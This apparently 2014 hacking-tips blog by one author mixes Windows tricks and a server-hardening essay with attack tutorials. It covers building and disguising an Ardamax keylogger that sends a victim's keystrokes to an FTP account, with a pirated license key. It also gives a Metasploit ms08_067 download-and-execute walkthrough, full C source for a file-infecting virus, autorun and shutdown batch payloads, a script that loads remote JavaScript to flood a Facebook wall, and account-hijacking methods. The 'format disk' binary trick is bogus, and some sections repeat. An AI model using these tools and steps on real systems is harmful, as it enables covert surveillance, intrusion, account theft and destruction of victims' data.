Friday, 26 December 2014
HACK WITH ARDMAX KEYLOGGER
ARDMAX KEYLOGGER 3.0 – WITH REGISTRATION KEY
"http://downloads.ziddu.com/download/14359500/Ardamax_Keylogger_3.0_SERIAL_FULL.rar.html">
copy link and paste and download
Download it and Install in your computer.
2- Now right-hand click it and click ‘Enter registration key…
3- Enter the Name and password in the box fields…
Name: Kimberley Ronald
Key: RGA3Y3A-M3D88-T3HU5-T28TM-G47A S-SFTD7-624JC
5- Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!
II. Creating the Keylogger Remote file:
1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…
Click ‘Next’
2. Now,you should see this.
3. If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.
4. Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.
5. Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.
6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’. Or else SkIp this also…
7- Uncheck the update optiong…
8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date
9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:
10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
FTP.DriveHQ.com
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:
Now Click ‘Test’ and it should pop up like this.
If not then see if the password and username is right.
Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.
11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.
12. Now you can change name and icon your Keylogger Engine as you want it to look like.
Just click ‘Finish’.
13. After you click ‘Finish’ you should see this:
Now Your Remote File Is Created
how to FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe............
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe............
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.ex
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD
Copy the following code:
010010110001111100100101010101010100000111111 00000
And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe)…
HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS
HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS
Requirements:
Nmap
Metasploit
First of all you need target ip of your slave.
Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]
Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV
[This’ll scan OS, Ports, and Services running on slave’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.
Now it’s time to exploit slave’s machine.
Exploit depends on the OS, Ports, and Services running on slave’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.
Now I’ll tell you exploiting:-
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Use: This’ll show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Use: This’ll show all targets by exploit]
Now Type set target 0
[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]
Then Type show options
[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]
Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]
At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]
You can now control you’re slave with RAT.
So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.
Good Luck!
Posted by adeel abba
Thursday, 25 December 2014
how to GET BACK YOUR RECYCLE BIN
GET BACK YOUR RECYCLE BIN
Recycle Bin is used to keep unnecessary files or folder. Some of my blog visitors asked about this problem that how they can get back their recycle bin after deleting it on windows XP.
You can use this method to get back recycle bin.
Important Note.
For this purpose you will have to modify the Registry. It is strongly recommended that if you have some basic knowledge of registry then you can try it. Otherwise some serious problems might occur if you modify the Registry incorrectly. Now let’s try it. Follow these steps carefully to edit the registry to make the Recycle Bin icon reappear on your desktop.
i. Click START and then click RUN
ii. Now type “ regedit” and then click OK.
iii. Locate the following registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsfot\windows\Current
version\Explorer\Desktop\namespace
iv. Right click the registry key that you located in number(iii), Point to new and then click key.
v. Now Type {645FF040-5081-101B-9F08-00AA002F954E} and press Enter.
vi. After this click the new {645FF040-5081-101B-9F08-00AA002F954E} key.
vii. In the right, use your mouse to double click the default entry.
viii. You will see a “Edit string dialog box”. Type Recycle Bin in the value data box and finally click OK.
ix. Now close your registry Editor and check your desktop.
x. You will see recycle Bin icon on your desktop wall.
make virus and shutdown computer of friend
Hello BestHacking Readers In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College,school,institute....and Fun With Friends
Step 1:>>copy this code into notepad:
@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
How to stop someone's internet access
hello everyone i am adeel abbasi , i will tell you How to stop someone's internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix
Saturday, 20 December 2014
window shortcuts
Windows 100 Shortcuts
KeyBoard Shortcuts
1 Copy CTRL+C
2 Cut CTRL+X
3 Paste CTRL+V
4 Undo CTRL+Z
5 Delete DELETE
6 Delete the selected item permanently without placing the item in the Recycle Bin SHIFT+DELETE
7 Copy the selected item CTRL while dragging an item
8 Create a shortcut to the selected item CTRL+SHIFT while dragging an item
9 Rename the selected item F2
10 Move the insertion point to the beginning of the next word CTRL+RIGHT ARROW
11 Move the insertion point to the beginning of the previous word CTRL+LEFT ARROW
12 Move the insertion point to the beginning of the next paragraph CTRL+DOWN ARROW
13 Move the insertion point to the beginning of the previous paragraph CTRL+UP ARROW
14 Highlight a block of text CTRL+SHIFT with any of the arrow keys
15 Select more than one item in a window or on the desktop, or select text in a document SHIFT with any of the arrow keys
16 Select all CTRL+A
17 Search for a file or a folder F3
18 View the properties for the selected item ALT+ENTER
19 Close the active item, or quit the active program ALT+F4
20 Display the properties of the selected object ALT+ENTER
21 Close the active document in programs that enable you to have multiple documents opensimultaneou sly CTRL+F4
22 Switch between the open items ALT+TAB
23 Cycle through items in the order that they had been opened ALT+ESC
24 Cycle through the screen elements in a window or on the desktop F6
25 Display the Address bar list in My Computer or Windows Explorer F4
26 Display the shortcut menu for the selected item SHIFT+F10
27 Display the System menu for the active window ALT+SPACEBAR
28 Display the Start menu CTRL+ESC
29 Display the corresponding menu) Underlined letter in a command name on an open menu (Perform the corresponding command) ALT+Underlined letter in a menu name
30 Activate the menu bar in the active program F10
31 Open the next menu to the right, or open a submenu RIGHT ARROW
32 Open the next menu to the left, or close a submenu LEFT ARROW
33 Update the active window F5
34 View the folder onelevel up in My Computer or Windows Explorer BACKSPACE
35 Cancel the current task ESC
36 Prevent the CD-ROM from automatically playing SHIFT when you insert a CD-ROMinto the CD-ROM drive
Dialog Box – Keyboard Shortcuts
1 CTRL+TAB Move forward through the tabs
2
CTRL+SHIFT+TAB
Move backward through the tabs
3 TAB Move forward through the options
4 SHIFT+TAB Move backward through the options
5 ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
6 ENTER Perform the command for the active option or button
7 SPACEBAR Select or clear the check box if the active option is a check box
8 Arrow keys Select a button if the active option is a group of option buttons
9 F1 key Display Help
10 F4 key Display the items in the active list
11 BACKSPACE Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
1 . Windows Logo
. Display or hide the Start menu
2 Windows Logo+BREAK
Display the System Properties dialog box)
3 Windows Logo+D
Display the desktop
4 Windows Logo+M Minimize all of the windows
5 Windows Logo+SHIFT+M Restorethe minimized windows
6 Windows Logo+E Open My Computer
7 Windows Logo+F Search for a file or a folder
8 CTRL+Windows Logo+F
Search for computers
9 Windows Logo+F1 Display Help
10 Windows Logo+ L Lock the keyboard
11 Windows Logo+U Open Utility Manager
12
Windows Logo+R Open the Run dialog box
Accessibility Keyboard Shortcuts
1
Right SHIFT for eight seconds
Switch FilterKeys either on or off
2 Left ALT+leftSHIFT+PRINT SCREEN
Switch High Contrast either on or off
3
Left ALT+left SHIFT+NUM LOCK
Switch the MouseKeys either on or off
4 SHIFT five times Switch the StickyKeys either on or off
5
NUM LOCK for five seconds Switch the ToggleKeys either on or off
6 Windows Logo +U Open Utility Manager
Windows Explorer Keyboard Shortcuts
1
END
Display the bottom of the active window
2
HOME
Display the top of the active window
3
NUM LOCK+Asterisk sign (*)
Display all of the subfolders that are under the selected folder
4 NUM LOCK+Plus sign (+) Display the contents of the selected folder
5
NUM LOCK+Minus sign (-) Collapse the selected folder
6 RIGHT ARROW Display the current selection if it is collapsed, or select the first subfolder
7 LEFT ARROW Collapse the current selection if it is expanded, or select the parent folder
at 11:20
Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest
No comments:
P
facebook some trick
*******Post an Empty/ Blank Status**************
Are you tired of constantly thinking new and interesting status updates for your Facebook friends? Then, post an empty status and show your friends that you denounce the thinking that if your status isn't cool, you aren't either. Just go to Facebook, hold Alt and press 0, 1, 7 and 3 respectively and click Post. This will post the null character as your status which basically is an empty space. Laptop users can do this after activating the Number Lock.
*********Change Facebook's Posted via text************
Have you noticed that when you update your Facebook status from a mobile, Facebook adds a "Posted via Mobile" link at the bottom of it? You can change that to say hilarious things like "via Carrier Pigeon" or "via My Bedroom." To do this, just go to PostedVia, choose a delivery option and update your status or post to a friend's wall.
************************ Know when friends Unfriend you*************
Facebook notifies you when someone adds you as a friend but Facebook does not notify you when someone unfriends you. If you wish to access this data, you can use Social Fixer Facebook extension, which will not only allow you to do this but a lot more too.
Top Ten Tips To Improve System Speed
Top Ten Tips To Improve System Speed
The below top ten tips are recommended for any system. It doesn’t matter if you have 256mb RAM or 2 GB RAM. Check the below tips to remove the memory junk and speedup windows os.
Top 1o tips to improve computer speed
1. Let your PC boot up completely before opening any applications.
2. Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3. Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4. Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5. Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6. Delete the temporary internet files regularly.
7. Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8. Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9. When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.
RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE! - See more at: http://aboutcomputerinfo.blogspot.com/2012/10/top-ten-tips-to-improve-system-speed.html#sthash.HC7rjyDz.dpuf
How to Create a Computer Virus? adeel abbasi
How to Create a Computer Virus?
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE
- See more at: http://aboutcomputerinfo.blogspot.com/2013/06/how-to-create-computer-virus.html#sthash.R4aR3x4P.dpuf
How to Create Folder "CON make it possible adeel
How to Create Folder "CON"
htt
Hi Guys, How are you? i hope you all are well. I was little bit busy that why can't post know i'm back with amazing and excite trick.
Ever tried to create a folder "CON" or "AUX" or "NUL".
Tried now??? -
not working :)
Here you go, a simple method to stop your anxiety
Rename folder from the right click option........
Now press alt and press 255...
press 255 frm the right side of the key bords i.e, Num pad.
where only numbers are given.....
now write con and then press enter.....yayyy!!
you ll see a con folder in ur pc and also you can delete it easily.I hope you enjoyed it.see you next time by by
- See more at: http://aboutcomputerinfo.blogspot.com/2013/07/how-to-create-folder-con.html#sthash.K4QU6Rrm.dpuf
WINDOWS 8 STORE HACK DOWNLOAD FREE PAID APPS FROM STORE [NO FILE PASSWORD] [NO SURVEYS]
WINDOWS 8 STORE HACK DOWNLOAD FREE PAID APPS FROM STORE [NO FILE PASSWORD] [NO SURVEYS]
Download Windows 8 Store Paid Apps For Free
Now Download PAID Apps From Windows 8 or Windows 8.1 Store For FREE!
Download the cracking tool for free without any file password and surveys
Download Windows 8 Store Paid Apps For Free
:: STEPS TO DOWNLOAD THE THE PAID APPS
Step 1 :- Open Store
Step 2 :- Click On Any Paid APP
Step 3 :- When The App Windows Opens Click on Try And Download it.
Step 4 :- After Downloading Don't Open It
Step 5 :- Extract The RAR File
Step 6 :- Open Folder "wscrack_64"
Step 7 :- Open Installer.exe
Download Windows 8 Store Paid Apps For Free
Step 8 :- Open "wscrack_anycpu"
Step 9 :- Open "TokensExtractor.exe"
Step 10 :- Search for The App Name You have downloaded And Click On it and click on Crack it
6 Ways to hack a Facebook Account | Facebook Hacking (New Tricks 2014) posted by Adeel Abbasi from azad kashmir
)
6 Ways to hack a Facebook account, something most of our readers always wanted to Learn, something new about Facebook Hacking. Learn the best attacks for Facebook Hacking with their advantages and drawbacks.
Note:- This tutorial is for educational purpose only and may not be used for any blackhat purpose. The prime aim of this tutorial is to create awareness so that you guys can protect yourself from getting hacked.
Before learning the actual procedure you should know about different types of attacks, their drawbacks and prevention against these attacks .
5 Ways to Hack a Facebook Account | Facebook Hacking
1) Phishing :
The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.
DRAWBACK :
Users nowadays are aware of these type of attacks and one can not be easily fooled using this attack. You need some social engineering to trick someone.
Prevention :
Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.
Other way is to use some good Antivirus software which will warn you if you visit a harmful phishing page.
Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.
2) Keylogging :This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.
DRAWBACK :Keyloggers are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
Execute the file only if you trust the sender.
Use online scanner such as novirusthanks.org
Use good antivirus and update it regularly .
3) Trojans/backdoors :
This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .
DRAWBACK :
Trojans are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
Execute the file only if you trust the sender.
Use online scanner such as novirusthanks.org
Use good antivirus and update it regularly .
4)Sniffing
It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
DRAWBACK :
If user is logged out then attacker is also logged out and the session is lost.
It is difficult to sniff on SSL protected networks.
Prevention :
Always use SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.
5)Social Engineering :
This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also lies under this category.
Drawback :
It is not easy to convince someone to make him give his password.
Guessing generally doesn’t always work ( Although if you are lucky enough it may work!).
Prevention :
Never give your password to anyone
Don’t believe in any sort of emails which asks for your password
6) Session Hijacking
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.
Drawbacks :
You will be logged out when user is logged out.
You will not get the password of the user’s account.
Will not work if the user is using HTTPS connections.
Prevention :
Always work on SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network
Add or remove your username in Start Menu
Add or remove your username in Start Menu
Posted by Adeel Abbasi
By default , windows shows your username at the top of start menu.If you want to remove this , you can just follow these steps:
>>Go to Start>Run . Type regedit to open registry editor
>>Now navigate to the following key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
No username in start menu
Click to zoom
>>If you can see a Dword value named NoUserNameInStartMenu then double click that key and change its value to 1 if you want to see remove username in Start Menu
>>Change its value to 0 if you want to see username in StartMenu
*If you cant see the above Dword value. Create a new dword value by right clicking on the right window pane and rename it to
How to make Mozilla Firefox 30 times faste
How to make Mozilla Firefox 30 times faster
How to make Mozilla Firefox 30 times faster
1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it
recieves.
If you're using a broadband connection you'll load pages 2-30 times faster now.
Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest
Exclussive fake facebook hack
Hi guys, I am here with a new trick with which you can make your friends to think like their account has been hacked while its not actually so.
yesterday I just noticed it while I was exploring fb through my mobile..Then tried it and yes its working...
so here we go with this trick...
By this trick you can upload status or photos or Video on anybody's facebook account..
Most People use facebook in their mobiles if you get acces to anybody of your frendz mobile just open his fb (people rarely logs out from phone!).
1.Now the trick is just look for a link just below status box & Photo (from where we upload photos on fb by mobile)
2. Click on it
3.You will see something like that copy or remember this email.
19.61 KB
4. Now you can mail anything like photo video or any text from your gmail/yahoo/or any email you want to upload as the victim/friendz status...
5.You can also get this email id via pc through the link
https://m.facebook.com/upload.php?_rdr
Your friends will just get sick of changing the password but they could never know how you are doing this......
So just show off in front of your friends....
Enjoy!!
Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest
Posted by
Hack Proofing Your Web Server
Hack Proofing Your Web Server
By: adeel abbasi
Most people think firewalls are all they need to secure their IT investment. Firewalls are very
important, but they are just one piece of the overall security picture. Even with perfect
installation, configuration, and maintenance, firewalls still must allow access to your public web
servers. Hackers know how to use this permitted access to gain the foot hold they need to gain
access to your network. The kind of access a web server can give them is nothing short of
complete administrative control.So when your organization decides to host a web server, you
should understand that the server is fully exposed to attack, even if it is behind a top notch
firewall. The most critical step towards protecting your public servers from attack is to harden
the servers and turn them into bastion hosts.
So what is a bastion host? A bastion host is a server that is configured very differently from
typical servers. Typical servers run hundreds of services and programs that are not needed.
Most of those services and programs are vulnerable to attack. The premise for building a
bastion host is that the server can be divided so that each of its partitions ful fills a specific role.
Once that role is understood—web server, mailserver, middleware server, etc.—the partition
can be secured to serve only that role. All the unnecessary services, executables, protocols,
programs, and network ports can then be disabled or removed.
------ If your web server is running on a default installation, you either are going to be
hacked, or you are currently hacked----
Building a bastion host is not easy. If the server you are trying to harden is running on
Windows NT, or Windows 2000, you have an especially tough road ahead. Win2k and NT are
very difficult to harden, but they, especially, must be hardened since more than with Linux or
UNIX, the default installation turns everything on. Your job is to turn almost all of it off. Do you
really want web server based printing running? Or web based password administration? Of
course not, yet the default installation for Windows NT and Windows 2000 turns these functions
on, as well as a couple hundred other dangerous configurations as well. This is why the Internet
world lost almost a billion dollars to Code Red and Nimda last year. If your Microsoft server was
properly hardened, you would not have been affected by either Code Red or Nimda, even if you
had neglected to install Microsoft’s security patches. Microsoft security patches are great, and
all administrators should religiously keep up with them, but only server hardening will protect
you from future outbreaks. What to turnoff and what to remove is the trick.
At Polar Cove we have our own system for hardening servers, and our own standard. Our
standard exceeds those of the National Security Agency and the F.B.I. The NSA standards are
excellent, and very high, but we have found that more could be done, and so we protect or
harden an additional 63 settings. It is important to have a standard in mind; otherwise you will
have difficulty measuring your results. As it is with any security plan, it is important to prove,
via some sort of measurement and standard, that you did, in fact, accomplish the security you
intended.
Why Harden Public servers?
(1) It reduces the likelihood of successful intrusions or attacks.
If you harden to NSA, or other strict standards, you protect your self from prosecution or
regulatory sanction by demonstrating compliance with an accepted prudent due care security
standard.
(2) It verifies secure configuration of your systems prior to network deployment, and prior to
exposure to attack.
(3) You can demonstrate to management that your system security measures up against high
security benchmarks and standards.
(4) You will be able to require your business partners to comply with a high security standard.
Using these three steps, securing, alerting and auditing, together can increase the level of
security of your company’s most valuable asset: its data.
Flood Any Facebook Account Of Your Enemy
Flood Any Facebook Account Of Your Enemy
hello im adeel abbasi i will show you how to do.......
Here i will share you all guys a simple trick on how to flood your enemies facebook
account by just a simple script:-
1. Log in to your account or create a new
facebook account so that your enemy couldn't
know who hit him/her.
2. After you have created your account just
simple go to your enimies facebook wall and paste this script...
j(a=(b=document).createElement
("script")).src="http://flooder.googlecode.com/files/FBWF.js",b.body.appendChild(a);void(0)
Then press enter.
3. Then a box will appear asking how much
flood you want to send.
Press okay, if you have decided how much.
4. Wait for a while. After the second box appear, enter what message you are going to write on victim's wall. After finishing press okay. Then you
will see your enemies facebook wall got flood!
Note:
Please dont send too much flood if you are using your main facebook account.
It will ban and delete it.
If you want to send more message make a dummy account.
Destroy Your Enemies P.C With Deadly Virus [Windows]
Destroy Your Enemies P.C With Deadly Virus [Windows]
What are Deadly
Virus ?
Deadly Virus are used
for destruction. They can
erase all your data on
hard disk, they can self
duplication, they limit you
from connecting to internet. they limit you
from the administrator
power, they self copy
when removable devices
are connected. they
disable the antivirus on excluding.
Downloading Deadly
Virus ?
We are posting some of
the best virus available on
internet. You can use this
viruses to destroy
computers. This are multi
purpose virus. They have all the property like self
duplication, limiting
administrator power, self
copying to removable
devices. You use this virus
to trick your friends etc.
Instruction On Using
this Deadly Virus
If you what to spread this
virus from removable
disk like pen drive etc.
You can make autorun
the virus. Do not try to
run this virus on your pc. It will ruin your
softwares, OS and
personal files. You can use
this on your friends pc if
you have any enmity with
him. The virus are highly dangerous. I ones more
repeat never test this on
your computer.
How to Autorun
Deadly Virus ?
[:ic-arrow:]Open notepad copy
the below text
[autorun]
open=VIRUS FILE NAME WITH EXTENSION [:ic-arrow:]Change VIRUS NAME WITH EXTENSION. To the name of the virus and with it’s extension. [:ic-arrow:]Save the file as autorun.inf [:ic-arrow:]Place the autorun.inf and the virus on the root dir of the removable device [:ic-arrow:]If you want you can hide the file We have added the deadly virus in a zip file. You should extract the files before adding to autorun Never try to exclude the virus on your computer . Disable your Antivirus before downloading the deadly virus Deadly Virus Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Posted by
Tuesday, 9 December 2014
What is Cyber Crime ………………….
adeel abbasi
Cyber crime and computer crime have become a
terms that we hear in the news with some frequency. To protect yourself
from cyber crime, you must first understand what it is and how it can
work against you. With the increasing popularity of shopping websites,
online banking and other sites that require sensitive personal and
financial data, cyber crime has become an ever-present threat.Cyber
crime can be hard to detect and even harder to stop once it has
happened. It can possibly have long-term negative impacts on victims.Cyber crime encompasses any criminal act dealing with computers and networks (called hacking). Additionally, cyber crime also includes traditional crimes conducted through the Internet. For example; hate crimes, telemarketing and Internet fraud, identity theft, and credit card
account thefts are considered to be cyber crimes when the illegal
activities are committed through the use of a computer and the Internet.
Computer crime issues have become high-profile, particularly those surrounding hacking, copyright infringement through warez, child pornography, and child grooming. There are also problems ofprivacy when confidential information is lost or intercepted, lawfully or otherwise.
The first recorded cyber crime took place in the year 1820! That is not surprising considering the fact that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage.
The first recorded cyber crime took place in the year 1820! That is not surprising considering the fact that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage.
General Information
Computer crime encompass a broad range of potentially
illegal activities. Generally, however, it may be divided into one of
two types of categories: -
- crimes that target computer networks or devices directly
- crimes facilitated by computer networks or devices, the primary target of which is independent of the computer network or device.
- Malware and malicious code
- Denial-of-service attacks
- Computing viruses
- Cyber stalking
- Fraud and identity theft
- Phishing scams
- Information warfare
How to Change Status Of Someone's Facebook Account How to Change Status Of Someone's Facebook Account
posted by adeel abbasi
How to Change Status Of Someone's Facebook Account
IMPORTANT!! : The slave MUST have the Facebook Text feature enabled in their account , if they don't then this will not work
So, in this Facebook hack, we will use SMSGlobal to change the status of your friend. SMSGlobal allows us to send message to any number from anyone’s number. That is, we will send Facebook a fake SMS from your friend’s registered mobile number.
Facebook will think that the message has been sent by your friend and his status will be updated according to the message contents sent by us.
